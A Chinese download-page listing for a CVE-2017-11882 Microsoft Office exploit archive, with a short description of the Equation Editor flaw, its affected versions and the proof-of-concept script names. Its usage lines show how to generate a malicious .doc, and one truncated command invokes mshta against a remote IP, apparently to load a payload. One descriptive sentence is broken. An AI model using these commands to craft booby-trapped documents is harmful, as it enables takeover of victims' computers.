文件名称:CVE-2017-11882:CVE-2017-11882(通杀Office 2003到2016)
文件大小:433KB
文件格式:ZIP
更新时间:2024-03-24 00:45:13
CVE-2017-11882概述 从突破利用效果来看,它可以通杀Office 2003到2016的所有版本,并且整个攻击环境的内置非常简单。此突破是由Office软件里面的[公式编辑器]造成的,由于编辑器进程没有对举个例子,如果黑客利用这个漏洞,构造带有外壳后门的office文件,当普通用户打开这个office文件,则电脑可以被黑客直接控制。 影响版本: office 2003 office 2007 office 2010 office 2013 office 2016 用法 python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc 点击生成的“ test.doc”,顺利投放计算机工具。 python Command_CVE-2017-11882.py -c "mshta http://192.
【文件预览】:
CVE-2017-11882-master
----img()
--------5.png(142KB)
--------1.png(53KB)
--------2.png(4KB)
--------4.png(113KB)
--------3.png(127KB)
----README.md(2KB)
----poc()
--------Command109b_CVE-2017-11882.py(11KB)
--------cve_2017_11882.rb(3KB)
--------Command43b_CVE-2017-11882.py(10KB)
--------Command_CVE-2017-11882.py(9KB)